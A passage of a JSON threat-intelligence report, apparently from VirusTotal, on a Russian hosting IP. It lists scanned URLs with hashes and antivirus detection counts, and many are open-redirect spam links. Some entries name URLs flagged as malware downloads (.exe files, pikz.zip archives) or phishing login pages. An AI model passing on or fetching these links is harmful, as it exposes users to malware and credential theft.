[\"http://woodrex.ru/go.php?go=http://nghienmakeup.com/filmmaker-to-open-wwii-education-center-in-rhode-island/\", \"c7aa1fb6a81c770ff7938c50f80f5bf5e44ed150dbd03da280db7b7c8eae06a3\", 0, 69, \"2019-03-04 13:30:35\"], [\"http://win61.ru/go.php?go=https://www.stylezza.com%2Feditorial-and-art%2F/\", \"797c93d3a1bb45c00e8065bc1a6bd0afb9eeee7e540fe2905eb406e91f6a1e8a\", 0, 69, \"2019-03-03 15:45:01\"], [\"http://transteh.net/goto/?url=https://www.stylezza.com/miss-ussr-monaco-during-the-mics-3273\", \"122807603e15d6b8cc5db71434ab17f85920a0a0240dc532c4e7f787beacb171\", 0, 69, \"2019-03-02 03:40:02\"], [\"http://security-job.su/resume/security-guard-for-home-land-security-sub-contract/\", \"1f3d9f8f906e9c470414d61e0f90a199a8547b7a62a7d13047c072e7f1b3ca90\", 0, 69, \"2019-03-01 21:40:40\"], [\"http://www.inbryansk.ru/chat/go.php?url=https://amateurspycams.com%2Fcategory%2Freallifecam%2F/\", \"a694f6052e6110fd49ea47934247137971b77c10b4d9ad2ea2dc9dc018c2fba1\", 0, 69, \"2019-03-01 18:55:01\"], [\"http://www.avtotransit.ru/bitrix/redirec.....dumps.com/netapp/ns0-170-exam-braindumps\", \"99416482d9bccfa605957043207fe70b2a5555c80b184b534ccc81b6f2713aac\", 0, 69, \"2019-02-28 14:03:04\"], [\"http://www.inbryansk.ru/chat/go.php?url=https://onlyprivatecams.com\", \"54b78eed66ce1aba5350eb32481d76c5c55382c09834a6a9f04d90bb57ef27b4\", 0, 69, \"2019-02-28 03:27:14\"], [\"http://flogiston.ru/\", \"839247dd3649a89b526d4c320b781010211708e34d4d9d40bafa974d7c148b97\", 0, 69, \"2019-02-24 19:18:05\"], [\"http://fishingpiter.ru/book/ribi/okun.html\", \"a4428aa12d80026c1d7d46f356b440e12b92e66e291cdbbca1104e492f4db404\", 0, 69, \"2019-02-24 09:17:04\"], [\"http://veneciaprint.ru/bitrix/rk.php?goto=http://www.stylezza.com/shopping/\", \"d49b3ea2e29341936d8655a5df3cd8d6f9fa9ce490546925276d0e1972decdc7\", 0, 69, \"2019-02-24 01:44:36\"], [\"http://carlobossoli.info/\", \"20312e42e7dc177818adcc4c7e0f1d0ed8436242fbc50c734b0ce6c87e08916f\", 0, 69, \"2019-02-23 05:16:03\"], [\"http://www.ariana.su/redirect.php?url=go.onescript.ir%2Findex.php%3Furl%3Dhttp%3A%2F%2Fwww.jagoweb.com\", \"a51662da4e9673ab21ec450aea8df17a220810e339eaa17dc30bb279cf31a57e\", 0, 69, \"2019-02-22 21:47:04\"], [\"http://www.cryogenmash.ru/\", \"6c9d752badd12cd51deeb921265625626c28f783aefa0c2ee6ad8936d9718a8d\", 0, 69, \"2019-02-21 11:51:15\"], [\"http://win61.ru/go.php?go=http://Quangcaohaithanh.com/\", \"0706e13bfd0f66b3862383832ebd748d01c16e47deb8266d78715b1f04a0fd6a\", 0, 69, \"2019-02-20 20:48:22\"], [\"http://dev-api.sledizastroykoy.ru/app-img-etalon/house/83/logo.png\", \"d04d95e90d31064889b6eb71c943b5aa752baaabad6a1f8f87e960906f2bb9d6\", 0, 69, \"2019-02-20 07:13:07\"], [\"http://oxstreet.ru/\", \"69c78b00db8d4e6d3cc251833bec6d28a2c6d7e54c5fea5917c12cfac84d15f4\", 0, 69, \"2019-02-17 19:23:53\"], [\"http://oxstreet.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://www.joymoney.org\", \"8216b286b1ea0427fae20dd5e76bc9de5a3ec5618b90437c7c81b3f5af7224f7\", 0, 69, \"2019-02-16 16:06:58\"], [\"http://win61.ru/go.php?go=https://www.go4braindumps.com/cisco/500-170-exam-braindumps\", \"28341718c4458f4f08dbb64ec049aa1499fa916489c34c7b6f98536c38257ccf\", 0, 69, \"2019-02-13 14:23:15\"], [\"http://www.stroysevkav.ru/objects/\", \"d98d69d09d885bb54a67877de4891d324c889b930abb9fab4b7f6e7fbe8ac12a\", 0, 69, \"2019-02-13 11:10:50\"], [\"http://cit-tmb.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://owonabewhari.mihanblog.com/post/59\", \"ef7e07daf6d7a0e8a6733f7076dbd1b984e2c196b4b373569b98295424a42c3e\", 0, 69, \"2019-02-08 15:27:17\"], [\"http://elkiboom.ru/bitrix/redirect.php?e.....g-dan-chi-tiet-ve-chung-khoan-phai-sinh/\", \"a37d9f39122e16ecf1757098d13de32aac2848135bd799b7fc9f5b2337b5ea35\", 0, 69, \"2019-02-08 13:53:53\"], [\"http://woodrex.ru/go.php?go=http://www.2.....sily-with-questions-and-answers-pdf.html\", \"c67b04972449a79624685be89ba89170360aa915bff0ba2915b471825da1a397\", 0, 69, \"2019-02-06 10:01:07\"], [\"http://woodrex.ru/go.php?go=http://contohskripsiku.com/\", \"29a4405193d6b79864653a91bfaa31424bf28e67096a3ecd5d3de41dd01d3aaa\", 0, 69, \"2019-02-03 06:46:02\"], [\"http://de.instergod.ru/biografiya-domov/epifanov.html\", \"37bf833664896ee0be7c19a7b9f8b88098563d385d6daf0b78ad1e8b9f6fa420\", 0, 69, \"2019-02-02 22:55:15\"], [\"http://nsync.ru/about/\", \"1c3e49ddf31bc54a7f4708dd969845d70c22c4de10bb3f30d0a939d84e580728\", 0, 69, \"2019-02-02 04:48:06\"], [\"http://car-fi.ru/rossiya\", \"ad5e0ff8d551418d12c9e2e2f4bbc23e19926ff563ecdf83ab1d2ff3eb81dda6\", 0, 69, \"2019-01-31 15:47:05\"], [\"http://win61.ru/go.php?go=https://www.go4braindumps.com/lpi/201-450-exam-braindumps\", \"9ef4802dcd80d610db8869df0881958e0141fa61e25424593a917a66dc23f87d\", 0, 69, \"2019-01-29 19:25:03\"], [\"http://sodb.ru/\", \"de6036967c96163e952847b54bd0d2db5beff5f7da0bbf452f4393f5354596d2\", 0, 69, \"2019-01-28 10:47:05\"], [\"https://hd.helppc.ru/help-client/foster-help-client-win-1.2.10.exe\", \"1c03611a493cb1829cd518a74eb3e33124afcd9e540f69efe6364bec7a599676\", 0, 69, \"2019-01-27 19:08:14\"], [\"http://woodrex.ru/go.php?go=https://chungkhoanvn.vn%2Fhuong-dan-chi-tiet-ve-chung-khoan-phai-sinh%2F\", \"a5f45c85b9ff4948433cdc267e014aa99fc8701609628811223d037100364156\", 0, 69, \"2019-01-27 13:13:38\"], [\"http://win61.ru/go.php?go=http://scorebet55.com\", \"f0c9c8c42993b015399ef76c9504eddd6ab22426bdb7efbf0c1137cafbcbb1b3\", 0, 70, \"2019-01-27 13:12:00\"], [\"http://parksale.ru/bitrix/redirect.php?e.....dan-chi-tiet-ve-chung-khoan-phai-sinh%2F\", \"4648741372b70ba0cb77d071a1bb23dadb6ec49597b25ccfa9700378d804374b\", 0, 69, \"2019-01-27 11:42:20\"], [\"http://lt.formulatx.com/\", \"7143af28f9ceaec461039f255e7aaf77777dcf7e214d34612d914c80d4b98907\", 0, 69, \"2019-01-26 00:52:32\"], [\"http://pw-expo.ru/taxonomy/term/72\", \"4b2208987d1769d5708b8993d3c56530f4fa9c2f3bb7595141de914253389d12\", 0, 69, \"2019-01-23 05:43:10\"], [\"http://proscooter.ru/proscooter.php?p=contact\", \"efad02a48a2280de5b882ccd5fa57e80ff57e681a83f152aac47d40b281f623d\", 0, 69, \"2019-01-21 22:19:12\"], [\"http://banket16.ru/Catering-kazan\", \"af6801565220c0a010439260d250d868bef121ea7187c37718a74dda1ec2272d\", 0, 69, \"2019-01-20 22:18:06\"], [\"http://promnasos.com/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=https://www.youtube.com/watch%3Fv=JrMZn3C2eDo\", \"9e86bb234fd66ed10ab91d238d9371a5ab36060aa11aca845d1e1946a7c4b2c6\", 0, 69, \"2019-01-20 11:40:13\"], [\"http://woodrex.ru/go.php?go=http://kickass.how\", \"166cf00f95f4a9bdb5253588fa09be13fe6a46c7f043081e3272526e3a0f7da4\", 0, 69, \"2019-01-20 10:23:01\"], [\"http://deoinfo.ru/apply/\", \"6ac0ec162f4a532e80c0f94d2e91e814dfe1027286b04e21d8642d0263026a46\", 0, 69, \"2019-01-19 05:14:05\"], [\"http://xn--80aealqgfg1azg.xn--p1ai/Documents/012019/\", \"e99c9accca6f2f8b4b2b85b8cb41c9e6ef146480ba5cad2f80f4b1f4327fe37e\", 0, 69, \"2019-01-18 16:47:24\"], [\"http://xn--80aealqgfg1azg.xn--p1ai/Documents/012019\", \"892fd65be4b97d014bc4ae9e1bee44bc4da7b16e2ebb46db92ac8f929529142d\", 0, 69, \"2019-01-18 16:45:55\"], [\"http://axilla.ru/consult/add_message.php\", \"2bc3e01e7f529e10451a0996afde83ee5821cc665bc9df76562d81a1dbe8081e\", 0, 69, \"2019-01-18 06:13:12\"], [\"http://www.avtotransit.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://huay.today\", \"711ae0d1d8685c32058ac8c8aca060a5d8a89375da44613040cb89cb09d7a983\", 0, 69, \"2019-01-17 20:11:03\"], [\"http://www.inbryansk.ru/chat/go.php?url=https://pusatsuntikamanblog.wordpress.com/\", \"a3af1e5c7f37848da0864c4545caf341d820be264214ee98257cde9e0b147c4d\", 0, 70, \"2019-01-17 14:51:15\"], [\"http://autocenter-neva.ru/\", \"770f342d2b9288e12445519906ab1f42afc522a4865dcf5737e02e5f41dd9f82\", 0, 70, \"2019-01-17 09:11:11\"], [\"http://inbryansk.ru/chat/go.php?url=https://freeprivatecamera.com/category/private-cam/\", \"8662cac4cf61d5ff72c5a407c7074591da462026846411ea1aff63b564eea2be\", 0, 69, \"2019-01-16 22:45:02\"], [\"http://astrontex.ru/partner.html\", \"b125dbf86ab37c850b9e2211b9f5d9ba2eccf0301b8a611536bb583f61ee667a\", 0, 69, \"2019-01-16 14:08:04\"], [\"http://www.avtotransit.ru/bitrix/redirec.....raindumpsstore.com/sap/c-tscm62-65-exams\", \"cc6fea2aaea537c593748235a813eafec3f2913bb35c45fa215a2a5a66a3beac\", 0, 69, \"2019-01-16 07:50:47\"], [\"http://vodnasos.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://www.stylezza.com/editorial-and-art/\", \"8a77244a71b430b5d82d00e02495c87e8cf4a3563ac8702b88e44e86bb259d1e\", 0, 69, \"2019-01-14 13:05:02\"], [\"http://cit-tmb.ru/bitrix/redirect.php?ev.....co.uk/component/k2/itemlist/user/4465472\", \"a476199400ffa073af6470a916a7a2d5c56341a603f76735fb7543e895f8bf3c\", 0, 70, \"2019-01-14 03:26:01\"], [\"http://tsaliev.com/product-category/sako-trg/\", \"54d9240a441a233a3aa53db24f2bee66adbdf3eea0cc130a460a21ad44c6a984\", 0, 69, \"2019-01-12 08:00:09\"], [\"http://www.moyshkaf.ru/4d5i1zp/el83vzfqj.php?bW1pa3VzZWtAc2V6bmFtLmN6\", \"ba5228b6ab073e94a3f66d96b55e1356d7ea4cecad4a9992bfa772ea62456c65\", 0, 69, \"2019-01-11 14:51:52\"], [\"http://bora-jetta.ru/smf/go/?http://www.cpunet.com.br/services.html\", \"17b497501fd3c4bb7a92a318fa2ce7e201ef56e7b6099024eeeba01ab4dc4aae\", 0, 69, \"2019-01-11 04:16:02\"], [\"http://vodnasos.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://arenabolasepak.com/\", \"0c5f43d641e0ed29a4d79e2e5b43aeea770026f659343f13ad2f7e0e3db5a128\", 0, 69, \"2019-01-11 01:20:07\"], [\"http://tri-tone.ru/bands-index/\", \"c62d3fc66a76772d3d27b03cc86f1cee9e2788b07bfdcf0c91c57d11c0254b57\", 0, 69, \"2019-01-10 15:53:05\"], [\"http://assower.ru/index.php?mn=def&mns=dejatelnost\", \"d93c1b294a1758ef5c23a2012eb05e5e4faf0ed6fb233b3e21a2d904376c519b\", 0, 69, \"2019-01-09 09:51:08\"], [\"http://podporozhye.ru/\", \"b84b193217d47e5088916208c3a4a40183a73de2675a1ee77fd7b7d15bc5c23f\", 0, 69, \"2019-01-09 02:50:06\"], [\"http://armopol.ru/component/option,com_contact/task,view/contact_id,1/Itemid,7/index.php?option=com_xmap&sitemap=3\", \"cfe72dc6163a9e291915fd75cacf45d5678780e9b94e7f25af0aa3d84041ddf1\", 0, 69, \"2019-01-08 07:49:05\"], [\"http://argus-beer.ru/retsept\", \"d531bdb66c8de684850064131dee66d3f00ba6e1fdba4f12fd28d21a160c7e2d\", 0, 69, \"2019-01-08 02:49:05\"], [\"http://win61.ru/go.php?go=https://u.wn.com%2Fp%2F436411359%2F\", \"7b5a172bbf044e5f114dff469e8990d61b0b1100d4499a590cea125cf49d6b84\", 0, 70, \"2019-01-06 01:47:01\"], [\"http://www.autonut.ru/go.php?url=http://chungkhoanvn.vn/huong-dan-chi-tiet-ve-chung-khoan-phai-sinh/\", \"82b1d6465055cc64d3ce4dfc746447ebfd26dad58ead7ebfd3f54c289cf5d845\", 0, 70, \"2019-01-05 12:53:38\"], [\"http://plasthirurgiya.ru/index.php?option=com_content&amp;view=article&amp;id=17&amp;Itemid=4\", \"cd3de0208894b4d4fa89642eb706c31227352ca8112674baf0511069dcc9f567\", 0, 69, \"2019-01-01 20:36:06\"], [\"http://instergod.ru/\", \"1abb497fff753767a5dabc078ad9536dccd8253a3698f6d09c490dd6cd8f4566\", 0, 69, \"2019-01-01 15:52:11\"], [\"http://win61.ru/go.php?go=http://vtv10.com/story/991789/\", \"66b4054bf613c59767fba8ad66aae7f7980854e0cfeef7961e4ebb5bd19fb49d\", 0, 70, \"2019-01-01 09:58:03\"], [\"http://modmenu.ru/go.php?go=http://www.c......php%3Fd=patrickdanielradke.blogspot.com\", \"7d60f768a866430a6f88379bdf62510f5ed0ed407f732e554d181107e38e5f83\", 0, 70, \"2019-01-01 09:15:14\"], [\"http://woodrex.ru/go.php?go=https://vtcnice.eu\", \"20ac4f691b2126097a431e3867ffcd9404f06d35df72b09cfa1a5fcd0a4300ed\", 0, 70, \"2018-12-31 10:21:03\"], [\"http://www.avtotransit.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://www.alibabasstore.com/\", \"7684895e0da098be9070f613d7882a7528a05ff52a56f24ed16476a2ac9808af\", 0, 69, \"2018-12-31 02:00:40\"], [\"http://anti-demodex.ru/advice.htm\", \"81f943cc78202a2c7b37a872f1ae688fd3f9331d6bcd48c6f1b74b5c7bf9198d\", 0, 69, \"2018-12-29 19:27:03\"], [\"http://transteh.net/goto/?url=http://www.vtcnice.eu\", \"cab61cd3708e05aa41a749604b6ef01e79421e64af170823024bca8a793db373\", 0, 70, \"2018-12-28 14:17:20\"], [\"http://zaborov.ru/blog/?p=4732\", \"8dc39c63c23eff865c20108849d721a869859709e53a24fdf7eaafcf449508cb\", 0, 69, \"2018-12-27 21:21:05\"], [\"http://www.np-stroykons.ru/links.php?id=voyeurfreecams.com%2Fcategory%2Fvoyeur-free-cam%2F\", \"f5d7cbc20ca097a5792cac0ccf8abf99eb7819fe47417b4630f3960d2a748d4b\", 0, 69, \"2018-12-27 07:50:52\"], [\"http://alvf.ru/index.php?option=com_content&amp;view=article&amp;id=4&amp;Itemid=6\", \"43ddbd3522aab8a8e6e2acd56e2e1bb5d09d78be45e5cf0a34012212c8245027\", 0, 69, \"2018-12-26 14:18:07\"], [\"http://crows.ru/\", \"d1bb9713930780886278419224648e31e4e8331b6417bcdea6fc906c494b4df1\", 0, 69, \"2018-12-25 15:15:04\"], [\"http://promnasos.com/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=https://soundcloud.com/phoenixrecording\", \"cc95d8d0e177b5d95614bc161ffc10be08696e5b31bc689d390d049ff5481bf7\", 0, 69, \"2018-12-23 18:45:13\"], [\"http://www.inbryansk.ru/chat/go.php?url=http://khitan.net/\", \"502dd299cfc2ee657a5000107c4c3626c15641ea8007112cb81fc32789dac4f8\", 0, 70, \"2018-12-22 08:01:22\"], [\"http://www.inbryansk.ru/chat/go.php?url=http://dphotographer.co.uk/user/ConradMiles04\", \"b8fcda53804d4154d2ad133612acb112fd2f49b58241dbc54a65bbe02a05b042\", 0, 70, \"2018-12-21 18:48:07\"], [\"http://oxstreet.ru/bitrix/rk.php?goto=http://www.xmhxxy.com/comment/html/%3F1702.html\", \"487c0ce2787cafb198637113d9c0a6cfd25663c8f2cb6e15e4347fa4a2a2a38b\", 0, 70, \"2018-12-17 19:29:09\"], [\"http://oxstreet.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=https://kasino.games/home/joker-123/56-joker123\", \"37e23e6531e88b911c434e94cfdeeb479e433ea6ec9d73175f71544bb8d3d4de\", 0, 70, \"2018-12-12 14:42:11\"], [\"http://xn--80ahdyajg.xn--p1ai/donella/\", \"c944b2abd42b006a9c9bbde2f9402d0f3b3396295d3cb50b393020070d27277d\", 0, 69, \"2018-12-12 04:45:05\"], [\"http://www.kafedrapik.ru/dvazhdyi-geroi-chetvero-studentov-poluchili-dvoynyie-diplomyi/\", \"26cf2a135be79db83f9ede84bf7ace1ec96525e606ca22ff5baa49a2ef63c46c\", 0, 69, \"2018-12-11 12:01:08\"], [\"http://woodrex.ru/go.php?go=http://www.pbase.com/janepratiwi78/profile\", \"cf1c665c32ad57852a4641f92b0d59341b77e5fe922c620761a26e9a2a92081d\", 0, 70, \"2018-12-11 08:02:02\"], [\"http://secur.ru/price.php\", \"2d8ebaf348264ac4c76db7a465fd4d5d7c74c1224b0ee75061c3020965d66038\", 0, 70, \"2018-12-08 23:40:04\"], [\"http://lolbar.ru/about/\", \"ad6f673d15536a75c6ffbdb06ca8009f2fe211f097cf4d0a9804e0aac26f8257\", 0, 70, \"2018-12-08 02:38:03\"], [\"http://karamba.su/IPB/index.php?app=core&amp;module=global&amp;section=navigation&amp;inapp=forums\", \"5eb647205b3b7ae5ea92f66d98609972759ac2483f1d38530edbe140fc84221e\", 0, 70, \"2018-12-07 22:37:12\"], [\"http://www.moyshkaf.ru/x2dabk/fb6gi79fu.php?a3Jpc3N0eXlua2FhYUBzZXpuYW0uY3o=\", \"4e92341af05fe318c3bff5ac8bd4a38e67022284b4eb6cbfa151317312588f20\", 0, 69, \"2018-12-07 20:38:03\"], [\"http://schoolproect.ru/ukrasheniya\", \"b6ef9f03d8686255440d0229b92913440a72ac8119034e5246427fa8b56b9659\", 0, 69, \"2018-12-06 16:35:03\"], [\"http://www.inbryansk.ru/chat/go.php?url=http://secret-service.od.ua\", \"e4fa5f7f456ce9292663574e8e1d3f84cc2c280d9df4e600ba597a0c011a9549\", 0, 70, \"2018-12-03 06:11:01\"], [\"http://win61.ru/go.php?go=http://Hronika.info/obwestvo/369393-kakie-cvety-luchshe-vsego-podarit-na-yubiley.html\", \"4e46366c6e2be31b78348c326140bde9517db7a5cbbd8b7c8dd1ebdc49833ce2\", 0, 70, \"2018-11-30 16:02:54\"], [\"http://oxstreet.ru/bitrix/rk.php?goto=http://www.Aoinform.com/news/dvp_osobennosti_i_preimushhestva/2018-08-27-25650\", \"ca656dc87576815c587521e1f71e78417c44c8862a3b14ce83773dce0d43be24\", 0, 70, \"2018-11-30 10:22:02\"], [\"http://win61.ru/go.php?go=http://iqfinance.ru/\", \"d5994f32b9ac8099c7e4ad7684c2941fb9fd558c68033a1ce99638e697e20ae4\", 0, 70, \"2018-11-30 09:19:06\"], [\"http://www.inbryansk.ru/chat/go.php?url=http://onlyprivatecams.com/category/private-life-cam/\", \"6e475bdfefe245abd0c3193d117e7e3b70aac44ee49136900792269ba4fef63b\", 0, 70, \"2018-11-30 02:07:05\"], [\"http://mcr-rus.org/albums/\", \"f4112ec1a5540bd0b527a88d7ed53c48a304ad014f349037ad520759b6097500\", 0, 70, \"2018-11-29 15:24:06\"], [\"http://instergod.ru/wp-content/uploads/2012/08/Sanierung-III-12-71.gif\", \"4b75b6ce7fb158edbaf8d928ccae2c6f68b501ecfc3ba91fd3639ce2d985c7d5\", 0, 69, \"2018-11-29 11:54:04\"]], \"whois\": \"Last updated on 2019-03-11T16:01:30Z\", \"country\": \"RU\", \"response_code\": 1, \"as_owner\": \".masterhost autonomous system\", \"verbose_msg\": \"IP address in dataset\", \"detected_urls\": [{\"url\": \"http://remont-iphone-spb.com/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-12 20:26:37\"}, {\"url\": \"http://www.provetom.ru/art/art_2.htm\", \"positives\": 8, \"total\": 69, \"scan_date\": \"2019-03-12 11:47:48\"}, {\"url\": \"http://gubino.net/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-12 03:46:32\"}, {\"url\": \"http://thar.ru/\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-03-12 02:40:31\"}, {\"url\": \"http://alliance-pravo.com/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-11 23:39:49\"}, {\"url\": \"http://ventkanal.ru/kwdl38g\", \"positives\": 6, \"total\": 66, \"scan_date\": \"2019-03-11 17:42:10\"}, {\"url\": \"http://autolombard.club/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-08 13:19:56\"}, {\"url\": \"http://moscowbmw.ru/\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-03-06 10:51:58\"}, {\"url\": \"http://belowtheweb.ru/avia/300%C3%97500/images/pikz.zip\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-06 07:47:16\"}, {\"url\": \"http://www.maxsev.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-05 09:59:52\"}, {\"url\": \"http://www.udvolga.ru/ext/logon.htm\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-03-05 06:31:57\"}, {\"url\": \"http://provetom.ru/prep/zimun.htm\", \"positives\": 3, \"total\": 66, \"scan_date\": \"2019-03-04 02:25:50\"}, {\"url\": \"http://provetom.ru/prep/med/vetomgin.htm\", \"positives\": 3, \"total\": 66, \"scan_date\": \"2019-03-04 01:18:43\"}, {\"url\": \"http://lagarto.ru/shok/shok.exe\", \"positives\": 6, \"total\": 66, \"scan_date\": \"2019-03-03 11:45:18\"}, {\"url\": \"http://lagarto.ru/syst/od.exe\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-03-03 11:44:47\"}, {\"url\": \"http://lagarto.ru/vk/vk.exe\", \"positives\": 5, \"total\": 66, \"scan_date\": \"2019-03-03 11:43:11\"}, {\"url\": \"http://aqarium.ru/screen/simaquarium2.06.exe\", \"positives\": 1, \"total\": 69, \"scan_date\": \"2019-03-03 05:46:04\"}, {\"url\": \"http://schetkin.ru/vats.php\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-03-02 17:41:15\"}, {\"url\": \"http://dendiet.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-02 12:54:57\"}, {\"url\": \"http://serafima.su/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-02 00:53:21\"}, {\"url\": \"http://krovly.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-03-01 23:19:30\"}, {\"url\": \"http://www.dobraja-trapeza.ru/wp-local/(.)/excel-login-1.html\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-03-01 16:27:51\"}, {\"url\": \"http://yandex-taxi-podklyuchenie.ru/\", \"positives\": 8, \"total\": 67, \"scan_date\": \"2019-02-28 21:08:30\"}, {\"url\": \"http://mosrybolov.ru/\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-02-28 15:39:40\"}, {\"url\": \"http://eyco.ru/catalog/view/disciplining.php\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-02-27 22:38:25\"}, {\"url\": \"http://xn----8sbcckyobxgc0e9f.xn--p1ai/?page_id=365\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-02-27 21:19:28\"}, {\"url\": \"http://okna-trust.ru/assets/images/fp.exe\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-27 17:31:38\"}, {\"url\": \"http://secur.ru.mastertest.ru/enter.php\", \"positives\": 1, \"total\": 69, \"scan_date\": \"2019-02-27 09:58:37\"}, {\"url\": \"http://smartspirit.ru/pikz.zip\", \"positives\": 7, \"total\": 67, \"scan_date\": \"2019-02-27 09:58:52\"}, {\"url\": \"http://autogirl.net/4c18a2f403135d64e8633f1cf29c9f67/pikz.zip\", \"positives\": 4, \"total\": 67, \"scan_date\": \"2019-02-26 19:37:32\"}, {\"url\": \"http://nikogda.ru/1st/css/pikz.zip\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-26 15:35:54\"}, {\"url\": \"http://xn----8sbcckyobxgc0e9f.xn--p1ai/\", \"positives\": 2, \"total\": 66, \"scan_date\": \"2019-02-25 14:55:33\"}, {\"url\": \"http://ooo.instergod.ru/\", \"positives\": 1, \"total\": 69, \"scan_date\": \"2019-02-24 09:00:32\"}, {\"url\": \"http://dvorec.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-24 01:56:47\"}, {\"url\": \"http://animals-msk.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-23 05:07:22\"}, {\"url\": \"http://www.ctkspb.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-23 03:35:04\"}, {\"url\": \"https://svadba-info.ru/\", \"positives\": 4, \"total\": 69, \"scan_date\": \"2019-02-22 15:55:19\"}, {\"url\": \"http://lomond.cc/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-22 14:50:57\"}, {\"url\": \"http://infaforms.com.mastertest.ru/oootpu/script.js\", \"positives\": 1, \"total\": 69, \"scan_date\": \"2019-02-21 10:02:53\"}, {\"url\": \"http://www.srbija.ru/media/system/js/\", \"positives\": 2, \"total\": 69, \"scan_date\": \"2019-02-21 05:15:08\"}, {\"url\": \"http://old.repost.uz.mastertest.ru/wp-content/themes/2/css/bootstrap.min.css\", \"positives\": 1, \"total\": 69, \"scan_date\": \"2019-02-20 12:58:44\"}, {\"url\": \"http://busineslunch.ru/\", \"positives\": 9, \"total\": 68, \"scan_date\": \"2019-02-19 18:14:40\"}, {\"url\": \"http://provetom.ru/prep/med/vetom3.htm\", \"positives\": 3, \"total\": 66, \"scan_date\": \"2019-02-19 04:41:09\"}, {\"url\": \"http://sibirskyles.ru/\", \"positives\": 5, \"total\": 66, \"scan_date\": \"2019-02-17 20:13:16\"}, {\"url\": \"http://interior.sudacov.com/:js_compile33\", \"positives\": 7, \"total\": 67, \"scan_date\": \"2019-02-17 15:56:18\"}, {\"url\": \"http://metal-volga.ru/price-list.html\", \"positives\": 5, \"total\": 66, \"scan_date\": \"2019-02-16 05:39:49\"}, {\"url\": \"http://bip2.ru/\", \"positives\": 6, \"total\": 66, \"scan_date\": \"2019-02-15 17:20:49\"}, {\"url\": \"http://tornadod.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-15 11:12:07\"}, {\"url\": \"http://legprominfo.ru/\", \"positives\": 1, \"total\": 66, \"scan_date\": \"2019-02-15 03:44:33\"}, {\"url\": \"https://fotoizdato.ru/\", \"positives\": 3, \"total\": 69, \"scan_date\": \"2019-02-14 21:10:14\"}, {\"url\": \"http://luxuryfair.ru/\", \"positives\": 6, \"total\": 66, \"scan_date\": \"2019-02-14 18:38:35\"}, {\"url\": \"http://downloads.acsys.ru/downloads/%CF%F0%EE%E3%F0%E0%EC%EC%FB/%C0%F0%F5%E8%E2%20%CF%CE/%C01212_A1214_ADM3/ADM3_Russian_3_0_57.exe\", \"positives\": 1, \"total\": 69, \"scan_date\": \"2019-02-13 21:21:02\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_cat.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:22:29\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_anton58.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:22:26\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_anton56.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:22:24\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_17.05_1.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:22:16\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_moon.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:22:09\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_190242.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:22:03\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_mosk38.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:21:24\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_city5.JPG\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:20:50\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_feja3.jpg\", \"positives\": 5, \"total\": 66, \"scan_date\": \"2019-02-13 19:20:45\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_anton45.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:20:37\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_mosk29.jpg\", \"positives\": 4, \"total\": 66, \"scan_date\": \"2019-02-13 19:20:26\"}, {\"url\": \"http://lagarto.ru/components/com_datsogallery/img_pictures/med_urb.jpg\", \"positives\": 4, \"total\": 66, 